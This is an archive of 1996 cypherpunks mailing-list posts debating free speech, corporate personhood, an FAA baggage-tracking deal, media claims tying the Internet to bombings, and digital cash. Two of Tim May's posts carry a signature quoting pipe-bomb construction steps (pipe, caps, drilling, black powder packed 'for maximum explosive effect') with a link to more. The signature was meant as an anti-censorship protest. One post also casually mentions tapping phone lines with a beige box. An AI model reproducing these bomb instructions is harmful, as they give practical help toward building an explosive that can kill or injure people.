				ARTICLE I. 
 
	Congress shall make no law respecting an establishment of religion, 
or prohibiting the free exercise thereof; or abridging the freedom of 
speech, or of the press; or the right of the people peaceably to assemble, 
and to petition the Government for a redress of grievances. 
 
 
If you will notice it says 'peaceably', I do not believe this should include
standing on the corner with a bullhorn screaming at people. A more
appropriate strategy would have been to walk over and give the government
folks food also with little political pamphlets wrapped around their
weenies. They would have most likely eaten their food, looked at the
pamphlet, got a good chuckle and gone back to being good little prols.

As the situation was at fist described is not quite how it was. This bozo
apparently was on the corner with the direct intention of harrassing folks.
This is uncalled for behaviour in such a situation. I agree with the
conclusion that there was an alterior motive other than feeding the
homeless. It sounds more like a podium for a personal tirade.


                                                Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 3 Aug 1996 23:36:48 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Tolerance (fwd)
In-Reply-To: <199608030750.CAA11930@einstein>
Message-ID: <Pine.SUN.3.91.960803063907.28773A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 3 Aug 1996, Jim Choate wrote:

> 
> It isn't my interpretation. Perhaps you should have paid better attention in
> class. These issues have never been tested in a court of law in the US in
> regards to computer networks and their special nature.

[...]

> That is a two edged sword. Where did you get your law degree? My lawyers
> both got theirs at UT Austin Law School. Both are federal lawyers and both
> have argued before the Supreme and are currently allowed to argue before the
> Supremes.


I've deleted most of Jim's meanderings above, mostly because I'm 
fascinated by the credentialism in the graf above.

He implies, without directly saying so, that "his lawyers" have weighed 
in on this dispute and agree with him. Of course this is hardly likely; 
he advances no coherent legal theory. (Except the "public forum" 
argument, which might apply to Usenet, but not cypherpunks.)

This is attempted proof by credentalism. I call him on it. 

Okay, Jim, what _do_ your lawyers say on this? Have you asked them? I,
too, have an attorney, a civil liberties specialist and a graduate from
Princeton law. So what? 

-Declan



// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 3 Aug 1996 22:22:09 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608031145.GAA12155@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 23:36:37 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: A Libertine Question (fwd)
> On Sat, 3 Aug 1996, Jim Choate's dog wrote:
> 
> > Really? Then would you mind explaining why costs rise over time
> > instead of going down?
> 
> Gladly. Prices rise over time because of inflation of the money 
> supply.  While it is possible for private actors to temporarily
> inflate the money supply (e.g., extension of credit by banks),
> only the government can increase the money supply indefinitely.  
> Inflation is the most insidious form of "taxation."  It steals
> silently and punishes the savings in favor of consumption.

Then why didn't the costs rise at the same rate as the general inflation
rate instead of tens of times faster? If the cost of airline tickets matched
the rise in milk then my gallon of milk would cost over $10 instead of the
$2 (this x5 factor I got from a news show the other nite, I have not
verified it) it costs now (and it has remained pretty constant over the last
10 years or so arguing that something has been balancing that inflation rate).
Since the inflation rate on a dollar is flat across the board in our economy
simple inflation does not account for this rise in prices in a niche market.
I guess it could be in the case of airlines because they have had to increase
the fairs to pay for the increase in aircraft loss due to crashes and fatigue
(airlines are not replacing their aircraft as fast now as they did in the
regulation days, one of the reasons Beoing and other commercial companies
are having such a hard time.) over the last few years as well as the rise in
the price of their insurance premiums since deregulation to compensate for
the increased payouts both due to increased frequency of crashes since
deregulation and the increase in the payouts to the victims and their families.
I would guess that insurance companies don't like paying for a multi-million
dollar plane unless they have to. They are in the business of not paying off
after all.

> > Insurance has become involved in the medical industry, what
> > happened? The cost has gone through the roof. The airplane
> > industry was deregulated in the late 70's, what happened? The
> > price of a ticket went up...yada yada yada.
> 
> Technically, Jim's logical fallacy is called /post hoc, ergo 
> propter hoc/, after this, therefore on account of this.

If it was a single case I would agree, the reason that I put several
unconnected fields which share one thing, the loss of government regulation.
What we are looking at is a inflation rate for unregulated commodities
like milk (for example) and compare them to the difference in operating
costs between a regulated versus a unregulated role. It is clear that with
a increase of x5 in this area and something like < x2 in the commodities
area that something is at play here other than pure inflation.

> > If this is so then by your own argument, business are operated
> > by people therefor they are people...
> 
> Nope, that's not what I said.  This fallacy is called a "straw
> man."  It is a weak or mistated opposing argument set up by a 
> politician or debator, etc., in order that he may attack it and
> gain an easy, showy victory.

A straw man is where I take one situation and compare it to another. I am
taking your supposition and applying it to a economic model that fits both
cases. Both businesses and individuals survive by trading their outgoing
products for incoming products. The issue is whether the rules that apply to
one should apply to another. If you look at the gross cash flow between a
business and a individual they are identical. Since we are talking about
gross cash flow in both cases it does not qualify for straw man status.

> > Is your contention that because I own and
> > operate a computer it should be given rights?
> 
> Nope.  Whatever gave you that idea?

Your contention was that a business should enjoy some of the same rights
that a person does because it was owned and operated by a person or persons.
Since I own and operate my computer and it is an inanimate object like the
system of rules and procedures used by a business they are comparable in
this case, as is comparison to any other inanimate object. The key points
here are that people have rights and your contention that because businesses
are owned and operated by people they should have rights as well. My goal is
to determine your litmus test (if you will) as to how you determine that a
business is eligible for such right but a automobile is not. Simply saying
they are different is not sufficient in this case.

> > > > Businesses are a system of rules and procedures...
> > > 
> > > Made and enforced by PEOPLE.  Jim is begging the question.
> > 
> > Which question would that be? "Should businesses be considered
> > people with the same rights and priviliges?"
> 
> Nope.  You just don't get it, do you?

I get it, it just doesn't make sense when looked at the way you are looking
at because you have still failed to elucidate your litmus test. Obviously it
is more complicated than simple ownership or else anything owned would
qualify. I am simply requesting clarification of the remainder of the test.
It is hard to evaluate a theory if you don't have access to the whole thing.
Sorta similar to analyzing a crypto algorithm via public peer revue.
Generaly considered a bad thing.


                                             Jim Choate







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 4 Aug 1996 00:39:57 +0800
To: Fallen Angel <fallenangel@multipro.com>
Subject: Re: problem
In-Reply-To: <3203D296.2E30@multipro.com>
Message-ID: <Pine.SUN.3.91.960803064650.28773B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I received a similar message in private email from the same person.

Obviously, he/she didn't know how to 'unsubscrive' properly. Hint: try 
email to majordomo@toad.com.

-Declan


On Sat, 3 Aug 1996, Fallen Angel wrote:

> I unsubscribed from your mailing list so why am I still receiving 
> email from it. I No longer wish to receive any more mail, so please stop 
> it.
> 
> Fallen Angel
> fallenangel@multipro.com
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 4 Aug 1996 00:53:50 +0800
To: cypherpunks@toad.com
Subject: Re: FAA to require transponders on all aircraft passengers
Message-ID: <199608031349.GAA18917@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


This does seem to be real.  CNet has a few more details:

http://www.cnet.com/Content/News/Files/0,16,2031,00.html

At 08:28 PM 8/2/96 -0700, you wrote:
>According to KCBS, a local radio station, the FAA has closed a long
>anticipated deal with a manufacturer of transponder devices. The goal of
>the system to be deployed nationwide is to match aircraft passengers to
>their luggage and thereby identify unaccompanied luggage on board an
>aircraft.
>
>Transponders will be affixed to all items of luggage and all passengers. If
>the system discovers a transponder on the luggage in the cargo hold without
>the corresponding transponder on the passenger on board, an alarm will
>sound. I am not making this up.
>
>As many of you know, I have long predicted subcutaneous transponders to
>become widely deployed in the near future. First for child identification
>and monitoring of criminals, then, as the children grow up, as universal
>ID, driver license, proof of eligibility for employment, PIN substitute,
>etc.
>
>Today, we moved a step closer to this future.
>
>[Note that the transponders will have to be affixed to the passenger. An
>example would be a hospital style bracelet that stops working when removed.
>Why embedding the transponder in a hand carried item, such as a card, will
>not work is left as an exercise to the reader. Even an affixed device does
>not provide perfect security. You'd really have to embed the transponder in
>the body at an early age to make removal nearly impossible.]
>
>
>
>-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
>   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
>   Vote Harry Browne for President.
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 3 Aug 1996 22:02:31 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: FAA to require transponders on all aircraft passengers
In-Reply-To: <v02120d0bae2873a00df4@[192.0.2.1]>
Message-ID: <199608031156.HAA07017@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> According to KCBS, a local radio station, the FAA has closed a long
> anticipated deal with a manufacturer of transponder devices. The goal of
> the system to be deployed nationwide is to match aircraft passengers to
> their luggage and thereby identify unaccompanied luggage on board an
> aircraft.

I thinks they have mixed their marbles....

The FAA is trialing (at the Olympics & Oshkosh) a GPS
rx/transponder; piped into a moving map.

The reason is their existing long-range radar (called ARSR --
Air Route surveillance Radar) is very long in the tooth, & they
have no hope of getting money to replace it. (Their recent 50
mile system procument, the ASR-9, looked like the worst of the
Sgt. York & the V-22...)

Note they spend $3-400E6 annually on radar maint. alone. [I
suspect they have to buy their vacuum tubes from St. Petersburgh,
the last source of them...]

The GPS scheme could replace:
	Primary Radar
	VOR [en route nav. -- lots of ground transmitters {?200?}
	scattered around country]
	ILS [instrument landing system]

It's the only rational thing I've seen the FAA pursue, vice be
forced into, in 20 years....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 3 Aug 1996 23:36:14 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <Pine.SV4.3.91.960803005947.1359E-100000@larry.infi.net>
Message-ID: <qq43RD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:
> Corporations are state-created persons [legal definition of "person", not
> colloquial vernacular]. They have some privileges which have surface
> resmblence to the rights of natural people. For example, they can "have
> standing" in a court to initiate a legal proceeding - in their own name,
> not that of an agent or employee or trustee.

Corporations could also own property at the time when many "real" persons
could not. Corporations could also be granted monopoly rights by the state,
like an exclusive right to trade with a certain region.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 4 Aug 1996 01:16:37 +0800
To: wb8foz@nrk.com
Subject: Re: FAA to require transponders on all aircraft passengers
Message-ID: <v02120d1cae291f445d20@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:56 8/3/96, David Lesher wrote:
[Quoting Lucky]
>> According to KCBS, a local radio station, the FAA has closed a long
>> anticipated deal with a manufacturer of transponder devices. The goal of
>> the system to be deployed nationwide is to match aircraft passengers to
>> their luggage and thereby identify unaccompanied luggage on board an
>> aircraft.
>
>I thinks they have mixed their marbles....

Nope. This from Micron's website:

Editorial Contact:

     Julie Nash, Micron Technology, (208) 368-4400
     Web Site URL http://www.micron.com
     Fax-on-demand: 800-239-0337

     FOR IMMEDIATE RELEASE

     MICRON COMMUNICATIONS, INC., ANNOUNCES AGREEMENT WITH THE FEDERAL
     AVIATION ADMINISTRATION

     Boise, Idaho, August 2, 1996 - Micron Communications, Inc., today
     announced a Cooperative Research and Development Agreement (CRDA)
     with the Federal Aviation Administration (FAA) to develop a model
     Positive Passenger Baggage Matching (PPBM) system. The objective
     of this PPBM system is to automatically recognize when baggage has
     been placed on an aircraft without an associated passenger. Micron
     Communications intends to utilize remote intelligent
     communications (RIC) technology developed for its MicroStamp
     family of products to design a security system which will enhance
     current systems and provide efficient tracking of passengers and
     baggage.

     "Micron Communications is proud to be associated with products
     that are designed to help increase the safety of airline travel,
     while providing operational benefits to the industry and
     increasing the convenience to the traveler," said John R. Tuttle,
     Chairman and President of Micron Communications, Inc. "Our
     experience in microelectronics and systems design should enable us
     to develop systems that use tomorrow's technology in finding
     solutions to these important problems."

     "Once again, an Idaho company is breaking new ground," Senator
     Larry Craig said. "As chairman of the Congressional-White House
     Task Force on Terrorism, its exciting to see this kind of
     high-tech advancement in security being developed here at home by
     Micron Communications, Inc. The Positive Passenger Baggage
     Matching system is exactly the kind of common-sense answer we are
     looking for to improve airline safety and give us all greater
     comfort when we fly in the future, " Craig continued.

     Current MicroStamp-based products include the MicroStamp credit
     card-sized device and the MicroStamp Engine in a 20-pin,
     small-outline integrated circuit (SOIC) plastic package. Micron
     Communications believes that the MicroStamp integrated circuit is
     the first wireless communications technology to integrate a
     single-chip CMOS solution, which includes a direct sequence spread
     spectrum (DSSS) microwave-frequency radio operating at 2.45GHz, a
     microcontroller, and low-power static random access memory (SRAM).
     It also contains a synchronous serial port allowing additional
     memory expansion.

     RIC units are different from RFID tags because they have a central
     processing unit (CPU), memory and microwave on board. This
     combination allows RIC units to perform more applications than
     low-performance RFID tags that use older technology at lower
     frequencies. MicroStamp RIC units are more powerful and more
     flexible than RFID units. They are also smaller and cost less than
     other RIC units of comparable performance.

     Systems integrators, original equipment manufacturers or end users
     interested in the MicroStamp family of products should contact
     Micron Communications Customer Service department, 1-888-MSTAMP1,
     (888-678-2671).

     Micron Communications, Inc., is a subsidiary of Micron Technology,
     Inc., whose common stock is traded on the New York Stock Exchange,
     Inc. (NYSE) under the symbol MU.

     MicroStamp and MicroStamp Engine are trademarks of Micron
     Communications, Inc.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Sun, 4 Aug 1996 00:12:44 +0800
To: cypherpunks@toad.com
Subject: Re: AP story: Police look for Olympic bombing Internet link.
In-Reply-To: <v03007803ae2846cb0c98@[17.202.12.102]>
Message-ID: <199608031426.IAA25403@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Bomb-making instructions
> available through the global computer network have contributed to an
> increase in bombings in the United States, authorities say.

My local paper (a Knight-Ridder rag) printed this story -- unquestioned --
as well.  Needless to say, I think a statement like this needs to be
responded to.  Letters to the editor, folks!  Wouldn't it be nice to have a
press that did a little more than print what the "authorities" have to say?

(This, of course, is the same paper that printed the recipe for a pipe bomb
on the front page after the explosion in Atlanta.  They included the
Elmer's glue and the all-important nails for best lethal effect -- you
might want to amend your sig again, Tim...:-)

Meanwhile, I have a question: as far as I know, no bombing has actually
been tied to the Internet in any way.  Does anybody know otherwise?  Even
though it's not really relevant to the principles of the debate here, it
seems worth pointing out.

jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 4 Aug 1996 04:24:57 +0800
To: frantz@netcom.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <199607302110.OAA05638@netcom8.netcom.com>
Message-ID: <199608030749.IAA00194@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz <frantz@netcom.com> writes:
> [...]  many of them are taking public positions on the ProCODE
> bill. Another of the things they are doing is deploying strong
> crypto domestically.
>
> Here is a start at a list of such companies:
> 
> Community ConneXion - Too much to mention, Thanks Sameer
> IBM - The Anarchistic Key Authorization system (from U of Texas), 
>    see 6th Usenix Security Symposium proceedings
> Netscape - SSL
> PGP Inc - 'nuff said
> Sun Microsystems - SKIP implementation, PGP v3 implementation

Sun PGP v3?  Whats the story behind this item?  Are sun sponsoring PGP
v3 development?

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carlos L. Mariscal" <clopez@nayar.uan.mx>
Date: Sun, 4 Aug 1996 02:30:20 +0800
To: Roger Williams <roger@coelacanth.com>
Subject: Re: [off-topic] roving wiretaps
In-Reply-To: <rogervif183vx.fsf@sturgeon.coelacanth.com>
Message-ID: <Pine.SUN.3.91.960803093240.20572A-100000@nayar.uan.mx>
MIME-Version: 1.0
Content-Type: text/plain



> >>>>> Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> writes:
> 
>   >> One should understand that monitoring cellular traffic is *much*
>   >> more difficult than tapping a conventional phone...
> 
>   > I'd have to disagree on that point.  Monitoring cellular traffic
>   > requires nothing more than a cellular phone, and some software
>   > which enables you to follow calls through the cells, for a total
>   > cost of about $500...
> 

	So, it is MUCH more difficult, or at least more expensive; anyone 
can get a beige box for less than US $10, right? And clipping it onto 
MaBell boxes takes less of a brain than programming or modifying a 
scanner or a cellular phone.   :)

    __       
    ||     
   ====         'If you can dream of it
   |  |__       then you can manage it'
   |  |-.\     
   |__|  \\         clopez@nayar.uan.mx
    ||   ||         
  ======__|     
 ________||__   
/____________\   Carlos L. Mariscal
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Aug 1996 02:31:15 +0800
To: cypherpunks@toad.com
Subject: Re: AP story: Police look for Olympic bombing Internet link.
Message-ID: <ae28cf25000210049ea4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:26 PM 8/3/96, Jonathan Corbet wrote:

>My local paper (a Knight-Ridder rag) printed this story -- unquestioned --
>as well.  Needless to say, I think a statement like this needs to be
>responded to.  Letters to the editor, folks!  Wouldn't it be nice to have a
>press that did a little more than print what the "authorities" have to say?
...
>Meanwhile, I have a question: as far as I know, no bombing has actually
>been tied to the Internet in any way.  Does anybody know otherwise?  Even
>though it's not really relevant to the principles of the debate here, it
>seems worth pointing out.

But, as I keep saying, this is not a very useful argument. Given that
bomb-makers get their information somewhere (encyclopedia articles, books,
Loompanics catalogs, etc.) and given that the Web is beginning to seriously
compete with these traditional sources, I have no doubts that the Net will
sooner rather than later be implicated in a bombing.

If one makes the arguments the the Net should not be regulated because it
has not been used to supply information for a crime, then what happens when
the Net *is* implicated? That particular argument then crumbles.

I prefer to argue it this way: "Sure, the Net could be used for information
on bombs. So could encyclopedias, books, "Time" and "Newsweek," and CNN. So
what? We don't throw out the First Amendment and our belief that people can
read and write what they want just because a few bombers may gain
knowledge. We don't shut down chemistry departments because bombers learn
about chemistry. And so on."

This is, I think, a more lasting and persuasive argument.

--Tim May

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 4 Aug 1996 03:09:27 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <v02120d08ae2866db0ddc@[192.0.2.1]>
Message-ID: <v03007801ae2933d82e72@[17.219.102.152]>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green opines:
>
>An international phone call costs about 2 cents/min to produce. The average
>rate paid for by the consumer is 62 cents. That's means the carriers mark
>up this particular product by an amazing 3000%.
>
>Can you name another business that has comparable mark-ups?
>

Well, software comes to mind.

In the international telephone case, you are paying 2 cents for the
call, and 60 cents for being able to place the call when you want to.

It's time for a story:

Once upon a time, Westinghouse's chief turbine engineer was called
to a power plant to diagnose a problem. He walked around the turbine
for a while, listened to it, thought for a bit, then took out a piece
of chalk and drew an X on the housing. "There is a bad bearing here;
replace it."

Westinghouse sent a bill for $10,000 for the diagnosis.

The power plant objected to the sum and asked for an itemized invoice.

Westinghouse sent: $0.05 for the chalk, $9999.95 for knowing where
to put the chalk.

Martin.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Aug 1996 02:52:24 +0800
To: cypherpunks@toad.com
Subject: Re: FAA to require transponders on all aircraft passengers
Message-ID: <ae28d1fd0102100449d6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:21 PM 8/3/96, David Lesher wrote:

>They are going to hang one of these on EVERY bag?
>
>At what per-unit cost?
>
>It's all the airlines can do to get barcode labels on each piece
>that geos by, much less even a credit-card-sized gadget. And how
>many will they lose???
>
>THEN think of the RFI problems.....

It turns out that I'm one of the early investors in a start-up company
developing a very similar product, albeit (we hope) with some technological
advantages. Lucky Green, for one, has met the principals in this company
and can confirm what I'm saying.

(I began working with them, and investing, several years ago. It was partly
the long-term implications of their ideas which triggered my proposal a few
years back: the "position escrow system." Under position escrow,
citizen-units would voluntarily escrow their positions for access by
authorized law enforcement officers, dietary compliance agents, social
workers, and other interested officials. The system is voluntary, as key
escrow is voluntary, in that it only applies when people leave their houses
and use the public streets; they are of course free not to leave their
houses, and hence not to voluntarily escrow their movements.)

I heard about the Micron-FAA deal on CNN, and went to the Micron Web site
for details. It's a spread-spectrum system, so it may well work in a
luggage environment (though perhaps not as well as the units planned by the
company I'm an investor in).

The "every bag" point is feasible, though I would assume conventional
luggage tags would work adequately. "Per-unit" costs could be low
enough....these units will be reused many times, after all.

The RFI problems are actually the least of the concerns, given the "code
space" technology which is possible. (That is, tens of thousands of
transponders can share the same RF spectrum in a local environment by
allocation of frequencies or, even better, by using code space
allocation...there are some close parallels with cryptography, of course,
as there are in communications technology and spread-spectrum technology in
general.)

Personally, I'm not convinced that the Micron-FAA deal with accomplish
much, but the authorities are rushing to "do something," so struggling
Micron may get some of the largesse.

(Besides, "bag escrow" will allow other agencies--such as DEA--to sniff
bags for traces of cocaine residue and then automatically issue arrest
orders for the citizen-unit associated with the bag. The surveillance state
needs technology like this.)

--Tim May

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 4 Aug 1996 03:27:19 +0800
To: cypherpunks@toad.com
Subject: Re: More evidence that democracy is bunk
In-Reply-To: <v02120d09ae28692597a7@[192.0.2.1]>
Message-ID: <v03007802ae2935f4ad55@[17.219.102.152]>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

>At 3:11 8/2/96, Deranged Mutant wrote:
>
>>If they were asked if they minded random searches of their bags and
>>belongings or required to carry photo-ID wherever they went, to be
>>presented on demand, would they still be willing?
>
>You bet. I remember a war on drugs releated poll from a few years back in
>which a majority supported warrantless searches of their homes.
>

At last month's SAFE (crypto policy) conference, one of the
legislators mentioned that someone snuck the text of the
Fourth Amendment into the crime bill, and it was voted down
in committee.

(It would be nice to dig this out of a transcript, so it doesn't
become an urban legand.)

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Aug 1996 03:20:16 +0800
To: cypherpunks@toad.com
Subject: Re: TrustBucks
Message-ID: <ae28d609020210043d2d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:11 AM 8/2/96, TrustBuckFella wrote:
>An alternative model of electronic money.
>
>Every model of electronic money I know of except one retains some degree
>of centralization. There is always a central "mint", usually a bank. If
>you can't find a bank that acts the way you want, you're SOL. And the
>only thing that enforces non-abuse (inflation, etc) by the bank is the
>equivalence of electronic money to some form of "real" money. The sole
>exception is Digicash. Unfortunately, Digicash has no restraint on
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>infinite spending-into-debt.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^

You want to elaborate on this contention?

If Alice transfers Digicash-type money to Bob, this is because Alice either
bought the DC-money someplace, or already had it, or otherwise arranged
with a bank to make the transaction. Maybe the bank "loaned" her money she
didn't already have, but this is a completely separable issue from the form
of DC-money.

So what is this "restraint on infinite spending-into-debt"? Gullible
lenders can always lend her vast amounts of money which she may never
repay, but this is fully separable from what transfer protocol she uses to
"spend" this loaned money.

If, on the other hand, your point is something about inflation, this is
also separable. Digicash and other forms of electronic money are generally
not currencies per se, but are a kind of transfer order, more like a check.
As such, not directly implicated in the issue of inflation.

>I'm not going to try to develop the cryptographic protocols for
>TrustBucks. I haven't got the requisite paranoia and pickiness
>(compliments both) for that. TrustBucks also has nothing in the way of
>anonymity and restraint on double-spending right now. If you can see how
>it could be anonymous or restrain double-spending and still work, please
>feel free to add.

No protocols. No anonymity. No protection against double-spending.

Looks promising. Keep us informed.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 4 Aug 1996 03:28:19 +0800
To: cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?"
In-Reply-To: <199608030923.CAA22990@toad.com>
Message-ID: <v03007803ae2939e89b1f@[17.219.102.152]>
MIME-Version: 1.0
Content-Type: text/plain


Does the English Only bill conflict with the UN Declaration of
Human Rights (Article 2):

Everyone is entitled to all the rights and freedoms set forth in this
Declaration, without distinction of any kind, such as race, colour, sex,
language, religion, political or other opinion, national or social origin,
property, birth or other status.

Note: "freedom of language"

For that matter, does the escrowed crypto legislation conflict with
Article 12:

No one shall be subjected to arbitrary interference with his privacy,
family, home or correspondence, nor to attacks upon his honour and
reputation. Everyone has the right to the protection of the law against
such interference or attacks.

My understanding is that the United States is (finally) a signatory
to the Declaration.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 4 Aug 1996 02:13:42 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030308.WAA11470@einstein>
Message-ID: <Pine.LNX.3.93.960803102059.928D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Jim Choate wrote:
> built it and occupy it. My dog has a better argument for civil rights than
> any business, it breaths and shits. Would you seriously give my dog a vote?
> I shure won't, and I won't support any business with rights.

     I bet your dog would vote better than a lot of people I know. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 4 Aug 1996 01:58:26 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <v02120d08ae2866db0ddc@[192.0.2.1]>
Message-ID: <Pine.LNX.3.93.960803102345.928E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Lucky Green wrote:
> At 8:50 8/2/96, Paul J. Bell wrote:
> >i, for one, and perhaps others on the list as well, would be interested in
> >hearing
> >what you mean when you say, "At&t, Microsoft, etc) who are ripping people
> >off on a
> >daily basis".
> >for example, in what way is AT&T ripping people off? and what about
> >microsoft?
> Its up to you what you call it, but here is an interesting example:
> An international phone call costs about 2 cents/min to produce. The average
> rate paid for by the consumer is 62 cents. That's means the carriers mark
> up this particular product by an amazing 3000%.
> Can you name another business that has comparable mark-ups?

     Drug (LSD) dealers.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 4 Aug 1996 01:57:07 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance (fwd)
Message-ID: <199608031527.KAA12332@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 3 Aug 1996 06:44:54 -0700 (PDT)
> From: Declan McCullagh <declan@eff.org>
> Subject: Re: Tolerance (fwd)

> > 
> > It isn't my interpretation. Perhaps you should have paid better attention in
> > class. These issues have never been tested in a court of law in the US in
> > regards to computer networks and their special nature.

> 
> [...]
> 
> > That is a two edged sword. Where did you get your law degree? My lawyers
